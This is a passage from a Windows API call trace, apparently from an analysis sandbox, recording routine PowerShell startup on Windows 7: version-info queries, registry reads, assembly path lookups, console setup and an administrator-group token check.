	[0049.414] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x1f30278, puLen=0x22e690) returned 1
	[0049.415] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0049.415] lstrcpyW (in: lpString1=0x3c3520, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0049.415] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x1f30314, puLen=0x22e690) returned 1
	[0049.415] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0049.415] lstrcpyW (in: lpString1=0x3c3520, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0049.415] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x1f30378, puLen=0x22e690) returned 1
	[0049.415] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0049.415] lstrcpyW (in: lpString1=0x3c3520, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0049.415] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x1f303f4, puLen=0x22e690) returned 1
	[0049.415] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0049.415] lstrcpyW (in: lpString1=0x3c3520, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0049.415] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x1f3009c, puLen=0x22e690) returned 1
	[0049.415] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0049.415] lstrcpyW (in: lpString1=0x3c3520, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0049.415] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x0, puLen=0x22e690) returned 0
	[0049.415] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x0, puLen=0x22e690) returned 0
	[0049.415] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x0, puLen=0x22e690) returned 0
	[0049.415] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e688, puLen=0x22e684 | out: lplpBuffer=0x22e688*=0x1f30044, puLen=0x22e684) returned 1
	[0049.415] VerLanguageNameW (in: wLang=0x0, szLang=0x3c3520, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0049.415] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\", lplpBuffer=0x22e69c, puLen=0x22e698 | out: lplpBuffer=0x22e69c*=0x1f2ffd0, puLen=0x22e698) returned 1
	[0049.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0049.422] GetLastError () returned 0xcb
	[0049.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0049.425] GetLastError () returned 0xcb
	[0049.428] lstrlenW (lpString="䅁") returned 1
	[0049.431] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e660 | out: phkResult=0x22e660*=0x2fc) returned 0x0
	[0049.431] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e664 | out: phkResult=0x22e664*=0x300) returned 0x0
	[0049.431] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e698 | out: phkResult=0x22e698*=0x304) returned 0x0
	[0049.433] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e6d8, lpData=0x0, lpcbData=0x22e6d4*=0x0 | out: lpType=0x22e6d8*=0x1, lpData=0x0, lpcbData=0x22e6d4*=0x56) returned 0x0
	[0049.434] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e6d8, lpData=0x3c3520, lpcbData=0x22e6d4*=0x56 | out: lpType=0x22e6d8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e6d4*=0x56) returned 0x0
	[0049.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0049.436] GetLastError () returned 0x0
	[0049.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0049.441] GetLastError () returned 0x0
	[0049.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0049.445] GetLastError () returned 0x0
	[0049.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0049.454] GetLastError () returned 0xcb
	[0049.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0049.843] GetLastError () returned 0x2
	[0049.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0049.843] GetLastError () returned 0x2
	[0049.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0049.929] GetLastError () returned 0xcb
	[0049.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0049.930] GetLastError () returned 0xcb
	[0050.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0050.067] GetLastError () returned 0xcb
	[0050.069] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0050.069] GetLastError () returned 0xcb
	[0050.069] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0050.069] GetLastError () returned 0xcb
	[0050.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0050.195] GetLastError () returned 0x0
	[0050.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0050.195] GetLastError () returned 0x0
	[0050.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0050.211] GetLastError () returned 0xcb
	[0050.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0050.213] GetLastError () returned 0xcb
	[0050.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0050.263] GetLastError () returned 0x7e
	[0050.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0050.263] GetLastError () returned 0x7e
	[0050.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0050.706] GetLastError () returned 0x2
	[0050.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0050.706] GetLastError () returned 0x2
	[0050.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0050.962] GetLastError () returned 0x57
	[0050.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0050.962] GetLastError () returned 0x57
	[0051.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0051.193] GetLastError () returned 0x2
	[0051.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0051.193] GetLastError () returned 0x2
	[0051.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0051.380] GetLastError () returned 0x2
	[0051.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0051.381] GetLastError () returned 0x2
	[0051.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0051.469] GetLastError () returned 0xcb
	[0051.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.470] GetLastError () returned 0xcb
	[0051.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.470] GetLastError () returned 0xcb
	[0051.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.470] GetLastError () returned 0xcb
	[0051.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.477] GetLastError () returned 0xcb
	[0051.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x22e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0051.591] GetLastError () returned 0x2
	[0051.591] SetErrorMode (uMode=0x1) returned 0x1
	[0051.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x22e654 | out: lpFileInformation=0x22e654*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0051.591] GetLastError () returned 0x2
	[0051.591] SetErrorMode (uMode=0x1) returned 0x1
	[0051.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.806] GetLastError () returned 0x0
	[0051.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.806] GetLastError () returned 0x0
	[0051.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.807] GetLastError () returned 0x0
	[0051.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0051.811] GetLastError () returned 0xcb
	[0051.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0051.813] GetLastError () returned 0xcb
	[0051.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0051.814] GetLastError () returned 0xcb
	[0051.815] CoCreateGuid (in: pguid=0x22e734 | out: pguid=0x22e734*(Data1=0xd456dff, Data2=0x174, Data3=0x407c, Data4=([0]=0x97, [1]=0x8, [2]=0x9c, [3]=0xa1, [4]=0x60, [5]=0xc3, [6]=0x27, [7]=0x56))) returned 0x0
	[0051.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0051.819] GetLastError () returned 0xcb
	[0051.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0051.820] GetLastError () returned 0xcb
	[0051.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0051.822] GetLastError () returned 0xcb
	[0051.861] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0051.861] GetLastError () returned 0x0
	[0051.862] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x22e614 | out: lpConsoleScreenBufferInfo=0x22e614) returned 1
	[0051.862] GetLastError () returned 0x0
	[0051.866] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0051.866] GetLastError () returned 0x0
	[0051.866] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x22e614 | out: lpConsoleScreenBufferInfo=0x22e614) returned 1
	[0051.866] GetLastError () returned 0x0
	[0051.867] GetVersionExW (in: lpVersionInformation=0x3c3538*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3c3538*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0051.867] GetLastError () returned 0x0
	[0051.868] GetCurrentProcess () returned 0xffffffff
	[0051.868] GetLastError () returned 0x3f0
	[0051.869] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x22e624 | out: TokenHandle=0x22e624*=0x320) returned 1
	[0051.869] GetLastError () returned 0x3f0
	[0051.871] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22e67c | out: TokenInformation=0x0, ReturnLength=0x22e67c) returned 0
	[0051.871] GetLastError () returned 0x7a
	[0051.872] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3a86b0
	[0051.872] GetLastError () returned 0x7a
	[0051.872] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x3a86b0, TokenInformationLength=0x4, ReturnLength=0x22e67c | out: TokenInformation=0x3a86b0, ReturnLength=0x22e67c) returned 1
	[0051.873] GetLastError () returned 0x7a
	[0051.875] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x22e634 | out: phNewToken=0x22e634*=0x318) returned 1
	[0051.875] GetLastError () returned 0x7f
	[0051.875] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22e67c | out: TokenInformation=0x0, ReturnLength=0x22e67c) returned 0
	[0051.875] GetLastError () returned 0x7a
	[0051.875] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3a8690
	[0051.875] GetLastError () returned 0x7a
	[0051.875] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x3a8690, TokenInformationLength=0x4, ReturnLength=0x22e67c | out: TokenInformation=0x3a8690, ReturnLength=0x22e67c) returned 1
	[0051.875] GetLastError () returned 0x7a
	[0051.876] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x1fb2e14*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x22e610 | out: IsMember=0x22e610) returned 1
	[0051.876] GetLastError () returned 0x7a
	[0051.876] CloseHandle (hObject=0x318) returned 1
	[0051.876] GetLastError () returned 0x7a
	[0051.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e154, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.876] GetLastError () returned 0x7a
	[0051.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.876] GetLastError () returned 0x7a
	[0051.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.876] GetLastError () returned 0x7a
	[0051.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.876] GetLastError () returned 0x7a
